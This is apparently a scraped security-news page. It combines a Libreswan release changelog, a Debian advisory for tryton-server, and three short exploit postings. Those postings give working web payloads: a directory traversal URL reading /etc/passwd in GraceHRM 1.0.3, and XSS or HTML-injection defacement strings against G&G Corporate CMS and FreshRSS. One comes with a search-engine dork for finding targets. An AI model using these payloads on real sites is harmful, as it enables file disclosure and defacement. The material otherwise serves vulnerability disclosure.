*   zip
*   tar.gz

v4.5 (August 20, 2021)

\* IKEv1: multiple subnets could lead to crossed wires, failures \[Paul/Andrew\]
\* IKEv2: don't tear down IKE SA on TS\_UNACCEPTABLE \[Paul\]
\* IKEv2: unpend/delete Child SA when rejected by IKE\_AUTH response \[Andrew\]
\* IKEv2: mobike: resolve\_defaultroute\_one() updates \[Andrew\]
\* IKEv2: mobike: prevent sending duplicate mobike response \[Andrew\]
\* IKEv2: Support for Childless IKE SA \[Andrew\]
\* IKEv2: redirect: make peer redirecting in IKE\_AUTH childless \[Vukasin\]
\* IKEv2: Labeled IPsec --up causes Childless IKE SA \[Andrew/Paul\]
\* IKEv2: Labeled IPsec conns share SPD policies (as IKEv1) \[Andrew/Paul/Kavinda\]
\* IKEv2: Performance; eliminate more O(#CONNECTIONS) code \[Andrew\]
\* IKEv2: Immediately delete replaced Child from new (IC) IKE SA \[Andrew/Paul\]
\* pluto: mismatched subnets= could take down all conns \[Paul\]
\* pluto: Don't delete existing IKE SA of connection instance \[Paul\]
\* pluto: fail better on parse errors in subnet= clause \[Paul\]
\* libswan: use getaddrinfo(3) instead of gethostbyname2(3) \[Hugh\]
\* libipsecconf: fail to load conn if no right= or left= set \[Paul\]
\* libipsecconf: change default of initial-contact= to yes \[Paul\]
\* X509: directly append new CRL requests to the fetch queue \[Andrew\]
\* whack: implement --impair trigger:<global-event> \[Andrew\]
\* ipsec.service: remove reload which did not work as expected \[Tuomo\]
\* portexcludes: update to use python3 \[Kim\]
\* building: fix NetBSD build \[Andrew\]
\* building: fix arm / aarch64 build \[kekePower@github\]
\* building: Remove support for RHEL6 USE\_OLD\_SELINUX \[Paul\]
\* packaging: handle properly rpm sysctl config \[Tuomo\]
\* packaging: rhel7: fix python2 shebang \[Tuomo\]

*   Aug 20, 2021
*   f36ab1b
*   zip
*   tar.gz

v4.4 (April 22, 2021)

\* IKEv2: Fixes for TCP encap in Transport Mode and host-to-host \[Paul/Sabrina\]
\* IKEv2: Fixes to Labeled IPsec policies \[Kavinda Wewegama/Paul\]
\* IKEv2: Add redirect statistics to whack --globalstatus \[Clive Zagno\]
\* IKEv2: Connections would not always switch when needed \[Andrew/Paul\]
\* pluto: Fix for host-to-host connections use non-standard IKE ports \[Paul\]
\* pluto: Use peer ID (IKEv2 IDr, IKEv1 Aggr) to select best initial conn \[Paul\]
\* pluto: Disable interface-ip= as the feature is not yet implemented \[Paul\]
\* pluto: Fix PLUTO\_PEER\_CLIENT\* in updown for NAT + Transport Mode \[Paul\]
\* pluto: Remove never updated PLUTO\_VERSION for updown scripts \[Paul\]
\* pluto: Actually set PLUTO\_CONNECTION\_TYPE= to transport or tunnel \[Paul\]
\* pluto: Allow non-templated wildcard ID connections to match \[Paul\]
\* pluto: Reduce and merge various logging messages \[Andrew\]
\* libipsecconf: Do not allow vhost/vnet in IKEv2 connections \[Paul\]
\* XFRM: Restarting pluto when using ipsec-interface= could fail \[Paul\]
\* contrib/munin: Update plugin to use python3 and update doc header \[Tuomo\]
\* testing: Enable OpenBSD interop tests \[Paul/Ravi\]
\* testing: Make tests more reliable on KVM \[Andrew\]

*   Apr 22, 2021
*   383a28e
*   zip
*   tar.gz

v4.3 (February 21, 2021)

\* pluto: Restore range checking on Labeled IPsec \[Paul/Andrew\]
\* pluto: Higher state serialno does not imply newest state \[Paul\]
\* pluto: Cleanup ip\_address vs ip\_endpoint (protoport dropping) \[Andrew\]
\* pluto: Revival of code could accidentally fallback to IKEv1 \[Andrew\]
\* newhostkey: Add support for generating ECDSA keys \[Daiki Ueno\]
\* libipsecconf: Ignore empty option at end of config (rhbz#1685653) \[Andrew\]
\* whack: Add --global-redirect and --global-redirect-to options \[Pietro Monteiro\]

*   Feb 21, 2021
*   8a6ccf7
*   zip
*   tar.gz

CVE-2023-38712: Tags · libreswan/libreswan

Debian Linux Security Advisory 5482-1 - Edbo and Cedric Krier discovered that the Tryton application server does enforce record rules when only reading fields without an SQL type.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5482-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 24, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tryton-server  
CVE ID         : not yet available

"Edbo" and Cedric Krier discovered that the Tryton application server  
does enforce record rules when only reading fields without an SQL type  
(like Function fields).

For the oldstable distribution (bullseye), this problem has been fixed  
in version 5.0.33-2+deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 6.0.29-2+deb12u1.

We recommend that you upgrade your tryton-server packages.

For the detailed security status of tryton-server please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tryton-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTnqjsACgkQEMKTtsN8  
TjbcjBAAmjWzeNl1H7A9skD50+wxRyOBQK+lrqpEcCekIit699viinOKJq4kKzsW  
/oZzZ8w+a/mKgcz9VgYUDuFE30h1kA43dMY9sb4GDpKRvXUGQ0bkbOYCBmktw+u1  
IWvYMccmTDCq9tnLh8yyrNV/q1/ZE2ZmC5ek2ASiXtmLKCYR3UoHxPjAHmYayD+o  
vVvPtmQ5/REr76+VCKupThY2+/Om4sxoeBoUvzH1O99QY5Na1QSZR1yfYzuTOF67  
LaiqwkTqiLr4kRtfE1ngcjuqWHrpOC14K7rMSn29sIYJLGQ0ILjpN73snZuUvlVz  
AAX+p1q61l/8mEJrMcDA//Qr1jMlZS4dk9SlkCfPofekFLv160pihc83NGJh/vPn  
KH62Bp71Fk9BLOqJOonITEHEoIrglecylwyjOy8cbg0X7AkaeLufZZjRV1VUS0yX  
Ff4n2qWMTjGEzqZeW9PVA6TTQ9ecSNfHzUF9qanI5F0eobSzhd4GefS9L6FL+hYi  
fZ9Em29e8y5SnQ+ePXCaBq5E78HIGb6f/+i2bzyRjAcaCKN4g0fO4PVIFXbmGHCC  
Wbp1DLX4T2Dpu5O60MtdlBjd538MSS7LLrvqcnaQNfNoD9ujEysM12BWP33QhwVK  
k4vrcxoQBj0P1vB08zQ3GhDfp6j9AxNLHDL5TP8gr1vJzmZfw5U=1vl7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5482-1

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

**GraceHRM 1.0.3 Directory Traversal**

Posted Aug 24, 2023

Authored by indoushka

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 1ef7aca42ba692fa60907a0530d21ee9db579bba9acd7d508271bcf4d6e8171a

Download | Favorite | View

**GraceHRM 1.0.3 Directory Traversal**

    ====================================================================================================================================| # Title     : GraceHRM v1.0.3 Directory traversal Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://p30vel.ir/                                                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /admin/download?type=files&filename=../../../../../../../../../etc/passwd[+] http://127.0.0.1/hrmgraceitltdcom/admin/download?type=files&filename=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,010)
*   Arbitrary (16,214)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,962)
*   File Inclusion (4,223)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,803)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,385)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,956)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,508)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,753)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,836)
*   UNIX (9,292)
*   UnixWare (186)
*   Windows (6,575)
*   Other

GraceHRM 1.0.3 Directory Traversal

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

**G And G Corporate CMS 1.0 Cross Site Scripting**

Posted Aug 23, 2023

Authored by indoushka

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ec7e6459653c2e6f1683c120c47e58e61d870a911a466497ef2ef99455a30669

Download | Favorite | View

**G And G Corporate CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : G&G Corporate CMS v1.0  XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://gegweb.it                                                                                                   |  | # Dork      : intext:Powered by Studio G&G Corporate Communication site:it                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /prodotti.php?LANG=2&id=prodotti&CAT=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://priolinoxit/prodotti.php?LANG=2&id=prodotti&CAT=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,006)
*   Arbitrary (16,212)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,952)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,147)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,799)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,186)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,383)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,953)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,504)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,750)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,835)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

G And G Corporate CMS 1.0 Cross Site Scripting

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

**FreshRSS 1.11.1 HTML Injection**

Posted Aug 23, 2023

Authored by indoushka

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

tags | exploit

SHA-256 | c789b4001ff7c396e22af1e82b8f9c8c3a4f13f593828eb66d0a73226d79294b

Download | Favorite | View

**FreshRSS 1.11.1 HTML Injection**

    ====================================================================================================================================| # Title     : FreshRSS v1.11.1 Html Inject Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://freshrss.org/                                                                                              |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  https://demo127.0.0.1/freshrssorg/i/?c=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,006)
*   Arbitrary (16,212)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,952)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,147)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,799)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,186)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,383)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,953)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,504)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,750)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,835)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

Tag

#debian